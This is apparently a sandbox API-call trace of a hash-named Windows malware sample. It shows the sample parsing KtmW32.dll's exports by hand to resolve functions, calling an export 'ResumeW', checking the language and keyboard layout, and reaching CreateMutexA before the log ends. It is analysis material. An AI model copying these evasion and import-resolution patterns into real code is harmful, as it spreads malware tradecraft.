[0113.290] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BringWindowToTop") returned 1 [0113.290] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BroadcastSystemMessage") returned 1 [0113.798] GetProcessHeap () returned 0x4f0000 [0113.798] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x40b9040 | out: hHeap=0x4f0000) returned 1 [0113.805] GetProcessHeap () returned 0x4f0000 [0113.805] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x10) returned 0x509230 [0113.805] LoadLibraryA (lpLibFileName="KtmW32.dll") returned 0x7ffc4bf10000 [0114.067] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0114.068] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0114.068] GetModuleFileNameA (in: hModule=0x7ffc4bf10000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\KtmW32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll")) returned 0x1e [0114.068] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\KtmW32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0114.068] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0114.068] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0114.068] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=24064) returned 1 [0114.068] GetProcessHeap () returned 0x4f0000 [0114.068] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x5e00) returned 0x2cf5030 [0114.069] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0114.069] ReadFile (in: hFile=0x17c, lpBuffer=0x2cf5030, nNumberOfBytesToRead=0x5e00, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2cf5030*, lpNumberOfBytesRead=0x14f5a4*=0x5e00, lpOverlapped=0x0) returned 1 [0114.069] CloseHandle (hObject=0x17c) returned 1 [0114.070] lstrcmpA (lpString1="CommitComplete", lpString2="CommitComplete") returned 0 [0114.070] lstrcmpA (lpString1="CommitEnlistment", lpString2="CommitComplete") returned 1 [0114.070] lstrcmpA (lpString1="CommitEnlistment", lpString2="CommitEnlistment") returned 0 [0114.070] lstrcmpA (lpString1="CommitTransaction", lpString2="CommitComplete") returned 1 [0114.070] lstrcmpA (lpString1="CommitTransaction", lpString2="CommitEnlistment") returned 1 [0114.070] lstrcmpA (lpString1="CommitTransaction", lpString2="CommitTransaction") returned 0 [0114.070] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitComplete") returned 1 [0114.070] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitEnlistment") returned 1 [0114.070] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitTransaction") returned 1 [0114.070] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitTransactionAsync") returned 0 [0114.070] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitComplete") returned 1 [0114.070] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitEnlistment") returned 1 [0114.070] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitTransaction") returned 1 [0114.070] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitTransactionAsync") returned 1 [0114.070] lstrcmpA (lpString1="CreateEnlistment", lpString2="CreateEnlistment") returned 0 [0114.070] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitComplete") returned 1 [0114.070] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitEnlistment") returned 1 [0114.070] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitTransaction") returned 1 [0114.070] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitTransactionAsync") returned 1 [0114.070] lstrcmpA (lpString1="CreateResourceManager", lpString2="CreateEnlistment") returned 1 [0114.070] lstrcmpA (lpString1="CreateResourceManager", lpString2="CreateResourceManager") returned 0 [0114.070] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitComplete") returned 1 [0114.070] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitEnlistment") returned 1 [0114.070] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitTransaction") returned 1 [0114.070] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitTransactionAsync") returned 1 [0114.070] lstrcmpA (lpString1="CreateTransaction", lpString2="CreateEnlistment") returned 1 [0114.071] lstrcmpA (lpString1="CreateTransaction", lpString2="CreateResourceManager") returned 1 [0114.071] lstrcmpA (lpString1="CreateTransaction", lpString2="CreateTransaction") returned 0 [0114.071] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitComplete") returned 1 [0114.071] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitEnlistment") returned 1 [0114.071] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitTransaction") returned 1 [0114.071] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitTransactionAsync") returned 1 [0114.071] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateEnlistment") returned 1 [0114.071] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateResourceManager") returned 1 [0114.071] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateTransaction") returned 1 [0114.071] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateTransactionManager") returned 0 [0114.071] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitComplete") returned 1 [0114.071] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitEnlistment") returned 1 [0114.071] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitTransaction") returned 1 [0114.071] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitTransactionAsync") returned 1 [0114.071] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateEnlistment") returned 1 [0114.071] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateResourceManager") returned 1 [0114.071] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateTransaction") returned 1 [0114.071] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateTransactionManager") returned 1 [0114.071] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="GetCurrentClockTransactionManager") returned 0 [0114.071] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitComplete") returned 1 [0114.071] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitEnlistment") returned 1 [0114.071] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitTransaction") returned 1 [0114.071] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitTransactionAsync") returned 1 [0114.071] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateEnlistment") returned 1 [0114.071] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateResourceManager") returned 1 [0114.071] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateTransaction") returned 1 [0114.072] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateTransactionManager") returned 1 [0114.072] lstrcmpA (lpString1="GetEnlistmentId", lpString2="GetCurrentClockTransactionManager") returned 1 [0114.072] lstrcmpA (lpString1="GetEnlistmentId", lpString2="GetEnlistmentId") returned 0 [0114.072] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitComplete") returned 1 [0114.072] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitEnlistment") returned 1 [0114.072] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitTransaction") returned 1 [0114.072] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitTransactionAsync") returned 1 [0114.072] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateEnlistment") returned 1 [0114.072] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateResourceManager") returned 1 [0114.072] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateTransaction") returned 1 [0114.072] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateTransactionManager") returned 1 [0114.072] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="GetCurrentClockTransactionManager") returned 1 [0114.072] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="GetEnlistmentId") returned 1 [0114.072] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="GetEnlistmentRecoveryInformation") returned 0 [0114.072] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitComplete") returned 1 [0114.072] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitEnlistment") returned 1 [0114.072] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitTransaction") returned 1 [0114.072] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitTransactionAsync") returned 1 [0114.072] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateEnlistment") returned 1 [0114.072] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateResourceManager") returned 1 [0114.072] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateTransaction") returned 1 [0114.072] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateTransactionManager") returned 1 [0114.072] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetCurrentClockTransactionManager") returned 1 [0114.072] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetEnlistmentId") returned 1 [0114.072] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0114.072] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetNotificationResourceManager") returned 0 [0114.072] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitComplete") returned 1 [0114.072] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitEnlistment") returned 1 [0114.072] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitTransaction") returned 1 [0114.072] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitTransactionAsync") returned 1 [0114.073] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateEnlistment") returned 1 [0114.073] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateResourceManager") returned 1 [0114.073] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateTransaction") returned 1 [0114.073] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateTransactionManager") returned 1 [0114.073] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetCurrentClockTransactionManager") returned 1 [0114.073] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetEnlistmentId") returned 1 [0114.073] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0114.073] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetNotificationResourceManager") returned 1 [0114.073] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetNotificationResourceManagerAsync") returned 0 [0114.073] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitComplete") returned 1 [0114.073] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitEnlistment") returned 1 [0114.073] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitTransaction") returned 1 [0114.073] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitTransactionAsync") returned 1 [0114.073] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateEnlistment") returned 1 [0114.073] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateResourceManager") returned 1 [0114.073] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateTransaction") returned 1 [0114.073] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateTransactionManager") returned 1 [0114.073] lstrcmpA (lpString1="GetTransactionId", lpString2="GetCurrentClockTransactionManager") returned 1 [0114.073] lstrcmpA (lpString1="GetTransactionId", lpString2="GetEnlistmentId") returned 1 [0114.073] lstrcmpA (lpString1="GetTransactionId", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0114.073] lstrcmpA (lpString1="GetTransactionId", lpString2="GetNotificationResourceManager") returned 1 [0114.073] lstrcmpA (lpString1="GetTransactionId", lpString2="GetNotificationResourceManagerAsync") returned 1 [0114.073] lstrcmpA (lpString1="GetTransactionId", lpString2="GetTransactionId") returned 0 [0114.073] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitComplete") returned 1 [0114.073] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitEnlistment") returned 1 [0114.074] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitTransaction") returned 1 [0114.074] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitTransactionAsync") returned 1 [0114.074] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateEnlistment") returned 1 [0114.074] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateResourceManager") returned 1 [0114.074] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateTransaction") returned 1 [0114.074] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateTransactionManager") returned 1 [0114.074] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetCurrentClockTransactionManager") returned 1 [0114.074] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetEnlistmentId") returned 1 [0114.074] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0114.074] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetNotificationResourceManager") returned 1 [0114.074] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetNotificationResourceManagerAsync") returned 1 [0114.074] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetTransactionId") returned 1 [0114.074] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetTransactionInformation") returned 0 [0114.074] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitComplete") returned 1 [0114.074] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitEnlistment") returned 1 [0114.074] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitTransaction") returned 1 [0114.074] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitTransactionAsync") returned 1 [0114.074] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateEnlistment") returned 1 [0114.074] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateResourceManager") returned 1 [0114.074] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateTransaction") returned 1 [0114.074] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateTransactionManager") returned 1 [0114.074] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetCurrentClockTransactionManager") returned 1 [0114.074] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetEnlistmentId") returned 1 [0114.074] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0114.074] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetNotificationResourceManager") returned 1 [0114.074] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetNotificationResourceManagerAsync") returned 1 [0114.074] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetTransactionId") returned 1 [0114.074] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetTransactionInformation") returned 1 [0114.074] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetTransactionManagerId") returned 0 [0114.075] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitComplete") returned 1 [0114.075] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitEnlistment") returned 1 [0114.075] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitTransaction") returned 1 [0114.075] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitTransactionAsync") returned 1 [0114.075] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateEnlistment") returned 1 [0114.075] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateResourceManager") returned 1 [0114.075] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateTransaction") returned 1 [0114.075] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateTransactionManager") returned 1 [0114.075] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetCurrentClockTransactionManager") returned 1 [0114.075] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetEnlistmentId") returned 1 [0114.075] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0114.075] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetNotificationResourceManager") returned 1 [0114.075] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetNotificationResourceManagerAsync") returned 1 [0114.075] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetTransactionId") returned 1 [0114.075] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetTransactionInformation") returned 1 [0114.075] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetTransactionManagerId") returned 1 [0114.075] lstrcmpA (lpString1="OpenEnlistment", lpString2="OpenEnlistment") returned 0 [0114.075] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitComplete") returned 1 [0114.075] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitEnlistment") returned 1 [0114.075] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitTransaction") returned 1 [0114.075] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitTransactionAsync") returned 1 [0114.075] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateEnlistment") returned 1 [0114.075] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateResourceManager") returned 1 [0114.075] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateTransaction") returned 1 [0114.076] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateTransactionManager") returned 1 [0114.076] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetCurrentClockTransactionManager") returned 1 [0114.076] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetEnlistmentId") returned 1 [0114.076] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0114.076] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetNotificationResourceManager") returned 1 [0114.076] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetNotificationResourceManagerAsync") returned 1 [0114.076] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetTransactionId") returned 1 [0114.076] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetTransactionInformation") returned 1 [0114.076] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetTransactionManagerId") returned 1 [0114.076] lstrcmpA (lpString1="OpenResourceManager", lpString2="OpenEnlistment") returned 1 [0114.076] lstrcmpA (lpString1="OpenResourceManager", lpString2="OpenResourceManager") returned 0 [0114.076] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitComplete") returned 1 [0114.076] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitEnlistment") returned 1 [0114.076] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitTransaction") returned 1 [0114.076] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitTransactionAsync") returned 1 [0114.076] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateEnlistment") returned 1 [0114.076] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateResourceManager") returned 1 [0114.076] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateTransaction") returned 1 [0114.076] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateTransactionManager") returned 1 [0114.076] lstrcmpA (lpString1="OpenTransaction", lpString2="GetCurrentClockTransactionManager") returned 1 [0114.076] lstrcmpA (lpString1="OpenTransaction", lpString2="GetEnlistmentId") returned 1 [0114.076] lstrcmpA (lpString1="OpenTransaction", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0114.076] lstrcmpA (lpString1="OpenTransaction", lpString2="GetNotificationResourceManager") returned 1 [0114.076] lstrcmpA (lpString1="OpenTransaction", lpString2="GetNotificationResourceManagerAsync") returned 1 [0114.076] lstrcmpA (lpString1="OpenTransaction", lpString2="GetTransactionId") returned 1 [0114.076] lstrcmpA (lpString1="OpenTransaction", lpString2="GetTransactionInformation") returned 1 [0114.076] lstrcmpA (lpString1="OpenTransaction", lpString2="GetTransactionManagerId") returned 1 [0114.076] lstrcmpA (lpString1="OpenTransaction", lpString2="OpenEnlistment") returned 1 [0114.076] lstrcmpA (lpString1="OpenTransaction", lpString2="OpenResourceManager") returned 1 [0114.076] lstrcmpA (lpString1="OpenTransaction", lpString2="OpenTransaction") returned 0 [0114.077] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitComplete") returned 1 [0114.077] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitEnlistment") returned 1 [0114.077] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitTransaction") returned 1 [0114.077] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitTransactionAsync") returned 1 [0114.077] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateEnlistment") returned 1 [0114.077] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateResourceManager") returned 1 [0114.077] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateTransaction") returned 1 [0114.077] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateTransactionManager") returned 1 [0114.077] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetCurrentClockTransactionManager") returned 1 [0114.077] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetEnlistmentId") returned 1 [0114.077] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0114.077] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetNotificationResourceManager") returned 1 [0114.077] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetNotificationResourceManagerAsync") returned 1 [0114.077] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetTransactionId") returned 1 [0114.077] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetTransactionInformation") returned 1 [0114.077] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetTransactionManagerId") returned 1 [0114.077] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenEnlistment") returned 1 [0114.077] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenResourceManager") returned 1 [0114.077] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenTransaction") returned 1 [0114.077] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenTransactionManager") returned 0 [0114.077] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitComplete") returned 1 [0114.077] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitEnlistment") returned 1 [0114.077] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitTransaction") returned 1 [0114.077] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitTransactionAsync") returned 1 [0114.077] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateEnlistment") returned 1 [0114.077] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateResourceManager") returned 1 [0114.077] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateTransaction") returned 1 [0114.077] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateTransactionManager") returned 1 [0114.077] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetCurrentClockTransactionManager") returned 1 [0114.077] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetEnlistmentId") returned 1 [0114.077] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0114.078] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetNotificationResourceManager") returned 1 [0114.078] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetNotificationResourceManagerAsync") returned 1 [0114.078] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetTransactionId") returned 1 [0114.078] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetTransactionInformation") returned 1 [0114.078] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetTransactionManagerId") returned 1 [0114.078] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenEnlistment") returned 1 [0114.078] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenResourceManager") returned 1 [0114.078] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenTransaction") returned 1 [0114.078] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenTransactionManager") returned 1 [0114.078] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenTransactionManagerById") returned 0 [0114.078] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitComplete") returned 1 [0114.078] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitEnlistment") returned 1 [0114.078] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitTransaction") returned 1 [0114.078] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitTransactionAsync") returned 1 [0114.078] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateEnlistment") returned 1 [0114.078] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateResourceManager") returned 1 [0114.078] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateTransaction") returned 1 [0114.078] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateTransactionManager") returned 1 [0114.078] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetCurrentClockTransactionManager") returned 1 [0114.078] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetEnlistmentId") returned 1 [0114.078] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0114.078] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetNotificationResourceManager") returned 1 [0114.078] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetNotificationResourceManagerAsync") returned 1 [0114.078] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetTransactionId") returned 1 [0114.078] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetTransactionInformation") returned 1 [0114.078] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetTransactionManagerId") returned 1 [0114.078] lstrcmpA (lpString1="PrePrepareComplete", lpString2="OpenEnlistment") returned 1 [0114.078] lstrcmpA (lpString1="PrePrepareComplete", lpString2="OpenResourceManager") returned 1 [0114.079] GetProcessHeap () returned 0x4f0000 [0114.079] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2cf5030 | out: hHeap=0x4f0000) returned 1 [0114.333] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameW") returned 0x7ffc5ecf4840 [0114.333] GetModuleFileNameW (in: hModule=0x7ffc45e90000, lpFilename=0x180013b88, nSize=0x104 | out: lpFilename="C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll")) returned 0x62 [0114.334] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x1000) returned 0x2cf5030 [0114.336] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x10) returned 0x509330 [0114.336] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ResumeW", cchWideChar=-1, lpMultiByteStr=0x509330, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ResumeW", lpUsedDefaultChar=0x0) returned 8 [0114.336] GetProcAddress (hModule=0x7ffc45e90000, lpProcName="\x10Т\x03") returned 0x0 [0114.336] GetProcAddress (hModule=0x7ffc45e90000, lpProcName="ResumeW") returned 0x7ffc45e91310 [0114.336] GetActiveWindow () returned 0x0 [0114.339] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetSystemDefaultLangID") returned 0x7ffc5ecf8d90 [0114.340] GetSystemDefaultLangID () returned 0x409 [0114.340] GetProcAddress (hModule=0x7ffc5e960000, lpProcName="GetKeyboardLayoutList") returned 0x7ffc5e9929a0 [0114.340] GetKeyboardLayoutList (in: nBuff=0, lpList=0x0 | out: lpList=0x0) returned 1 [0114.340] GetProcessHeap () returned 0x4f0000 [0114.340] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x4f3ca0 [0114.340] GetProcAddress (hModule=0x7ffc5e960000, lpProcName="GetKeyboardLayoutList") returned 0x7ffc5e9929a0 [0114.340] GetKeyboardLayoutList (in: nBuff=1, lpList=0x4f3ca0 | out: lpList=0x4f3ca0) returned 1 [0114.340] GetProcessHeap () returned 0x4f0000 [0114.340] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x4f3ca0 | out: hHeap=0x4f0000) returned 1 [0114.341] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateMutexA") returned 